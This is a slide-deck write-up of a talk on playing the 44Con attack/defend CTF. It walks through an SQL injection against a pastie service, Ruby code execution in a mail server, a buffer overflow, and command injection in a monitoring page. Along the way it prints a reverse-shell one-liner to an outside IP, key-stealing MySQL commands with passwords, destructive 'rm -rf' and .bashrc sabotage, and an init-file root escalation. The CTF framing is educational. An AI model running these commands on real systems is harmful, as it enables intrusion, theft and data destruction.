The document summarizes the author's experience playing a capture the flag (CTF) competition called the 44Con CTF. It describes recon activities like scanning services to identify vulnerabilities. Several services are found to have exploitable issues, including a pastie service with SQL injection, a mail server with remote code execution, and an authentication service with a stack buffer overflow. The author is able to exploit these issues to steal flags, gain a remote shell, and eventually escalate privileges to root through service restart hijacking and a mail service vulnerability. Overall it provides a play-by-play of the reconnaissance and exploitation steps taken during the CTF.

1. Playing the 44Con CTF
for fun & profit

2. Me
"Three Headed Monkeys"
3hm@0xbadf00d.co.uk
@impdefined

3. Me
Software developer
Trying not to make things worse
Know a lot about bugs
CTF team 0xbadf00d
Contributor to io.smashthestack.org

4. CTF
Solving technical security challenges to get
points.
"It's kind of like a Computer Science exam on
acid"*
* CSAW CTF "About"page

5. CTF Types
Challenge-based
DEF CON quals
Ghost In The Shellcode
CSAW CTF
Attack/defend
DEF CON finals
44Con CTF (this year)

6. 44CON CTF

7. 44CON CTF - What we got
Virtual Machine image
IP Address
Scope of "attackable" machines

8. Attack & Defend
Kind of like a pentest
(maybe, I've never done a pentest)
I have a plan:
Recon
Harden
Write exploits
Run riot
Get the girl
Save the world

9. Step 1 - Recon
I'd rather be offline than owned
Self-recon
Capture traffic
Quick nmap of non-player servers

10. Recon - Services

11. Recon - Services

12. Recon - Scoring
Regular "scoring rounds"
Score server stores new keys in services
Score server checks for previous keys?
Every 30 minutes
Not great if you're trying to see talks!

13. pastie

14. Pastie

15. Pastie

16. Pastie
Written in PHP
Pastes stored in a MySQL database
Recon shows keys are stored as pastes
PHP+MySQL - Can you tell what the vuln is
yet?

17. Pastie vuln

18. Pastie vuln
C
Classic SQL injection

19. Pastie fix
It's not all pwnpwnpwn
Not very sexy
Updated to use prepared statements

20. Pastie exploit
I want keys!
Had a look at my own DB to figure out the
query

21. Pastie exploit
https://ip/view/%'+and+lang+=+'text'+order
+by+date+desc+--+

22. Pastie exploit

23. Pastie exploit - scripted

24. mailserver

25. Mailserver
SMTP and POP3 server
Keys are stored in emails
Written in Ruby
I don't know Ruby
~ 500 lines

26. Mailserver - vulnerability

27. Mailserver - vulnerability
???
This just runs whatever Ruby code you give it
Time to learn Ruby!

28. Mailserver - verification
Looking at the logs...

29. Mailserver - exploitation
I'm sure Ruby is lovely...
... but let's just find some code to copy

30. Mailserver - exploitation

31. Mailserver - exploitation

32. Mailserver - scripted exploitation

33. auth

34. Auth
Running on port 23500

35. Auth

36. Auth - vulnerability
Source analysis 101

37. Auth - exploitation

38. Auth - exploitation
Classic stack buffer overflow
Overwrite return address with value of my
choice
Remote code execution.....
....right?

39. Auth - exploitation
Welcome to CTF rage

40. Auth - exploitation

41. Auth - exploitation
Just put a valid writable address in the buffer
ptr!
Easy if this was a 32bit process.
Our memory space is annoying.

42. Auth - exploitation
gdb$ info proc map
Mapped address spaces:
Start Addr End Addr Size Offset objfile
0x400000 0x403000 0x3000 0x0 /services/auth/auth
0x602000 0x603000 0x1000 0x2000 /services/auth/auth
0x603000 0x604000 0x1000 0x3000 /services/auth/auth
0x604000 0x625000 0x21000 0x0 [heap]
........ ........ ....... ... ......
0x7ffffffde000 0x7ffffffff000 0x21000 0x0 [stack]
0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall]

43. Auth - exploitation
gdb$ info proc map
Mapped address spaces:
Start Addr End Addr Size Offset objfile
0x0000000000 400000 0x0000000000403000 0x3000 0x0 /services/auth/auth
0x0000000000 602000 0x0000000000603000 0x1000 0x2000 /services/auth/auth
0x0000000000 603000 0x0000000000604000 0x1000 0x3000 /services/auth/auth
0x0000000000 604000 0x0000000000625000 0x21000 0x0 [heap]
........ ........ ....... ... ......
0x00007ffffffde000 0x00007ffffffff000 0x21000 0x0 [stack]
0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall] (read-only)

44. Auth - exploitation
Time's up!
No remote code execution :-(
Very limited DoS
Crash process
Restarts automatically

45. servicemon

46. Servicemon
Web page
Looks like it monitors the other services
Ruby again

47. Servicemon - vulnerability
Command execution of "filelist" parameter

48. Servicemon - exploitation
Never mind keys, I want a shell
contestant@ubuntu:~$ nc -l 31337 -e /bin/sh
nc: invalid option -- 'e'

49. Servicemon - exploitation
*cracks knuckles*
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i
2>&1|nc 192.168.1.75 31337 >/tmp/f
http://ip:3000/hash?filelist=notafile||rm%20%
2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%
3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%
20-i%202>%261%7Cnc%20192.168.1.75%
2031337%20>%2Ftmp%2Ff

50. Servicemon - exploitation
contestant@ubuntu:~$ nc -lv 31337
Connection from 192.168.1.72 port 31337 [tcp/*]
accepted
$ whoami
contestant
$ pwd
/services/servicemon
Now we can have some fun!

51. rampage

52. Steal all the keys
mysql --user=sinatra --password=44ConCTF servicemon -e "select
status from statuses order by created_at desc limit 1;"
mysql --user=pastie --password=J@cobsClub$ paste -e "select
pastie from pastie order by date desc limit 1;"
OUTPUT=redis-cli -r 1 keys * | tail -n 1
redis-cli -r 1 lrange $OUTPUT 0 1

53. Leave a calling card
echo 'Look behind you! A three-headed monkey!' >
/services/pastie/.win

54. Annoy
echo 'export PROMPT_COMMAND="cd"'
>> ~/.bashrc
echo exit >> ~/.bashrc
rm -rf /services

55. escalation

56. Escalation
Getting keys is fine
Getting shells is better
Getting root is best

57. Escalation - the hard way
$ find /etc -writable
/etc/init/mail.conf
/etc/init/auth.conf

58. Escalation - the hard way
USER PID TTY STAT COMMAND
root 8680 ? Ss /services/auth/auth

59. Escalation - the hard way
Next time auth respawns we will get a root shell
Lame DoS to the rescue!
perl -e 'print "auth " . "A"x1100 . "n"' | nc ip 23500
Connection from 192.168.1.73 port 31337 [tcp/*] accepted
# whoami
root

60. Escalation - the easy way
220 Mail Service ready (33147)
HELO
250 Requested mail action okay, completed
EXPN respond(client, `whoami`)
root

61. summary

62. Summary
CTFs are fun!
http://smashthestack.org
- start with io
http://overthewire.org
http://hackthissite.org

63. questions